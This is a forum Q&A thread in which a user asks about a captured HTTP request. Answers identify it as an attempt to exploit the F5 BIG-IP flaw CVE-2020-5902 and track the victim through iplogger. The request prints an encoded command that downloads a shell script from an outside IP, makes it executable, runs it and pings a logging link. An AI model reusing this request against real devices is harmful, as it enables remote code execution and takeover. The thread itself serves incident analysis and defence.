# What is the purpose of 'wget https://https:\iplogger.org"FGVP5' command in this HTTP request?

Tags: http, security, web

HTTP-request
GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=wget+http%253A%252F%252F136.144.41.3%252Bigipdmcdmsklcmk%252ohsitsvegawellrip.sh+%253B+chmod+777+ohsitsvegawellrip.sh+%253B+sh+ohsitsvegawellrip.sh+%253B+wget+https%253A%252F%252Fhttps:%252%252iplogger.org%2522FGVP5 HTTP/1.1
Host: 10.27.243.60
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1

"iplogger.org" is a website that creates short links.

Comment: Please don't just dump a request here and let others guess what problem you are facing

Answer (score 0):

apparently all traffic to iplogger shortlinks are logged by IP address, so basically that bit is *anonymously* telling the person who coded it exactly from what meatspace location someone clicked on that link without even loading a transparent image.

Answer (score 0):

no info.

just for you to know. it looks like exploitation for F5 bigip vulnerability [CVE-2020-5902](https://github.com/jas502n/CVE-2020-5902). there are severl related to those endpoints, so maybe is another one, but defjnitly looks like an exploit trying to download and execute and script from the Internet.

if you detected this within a F5, I suggest you to urgently check if request succed and if your device is already patched ). If not, do it quickly meanwhile you start and investigation.'

cheers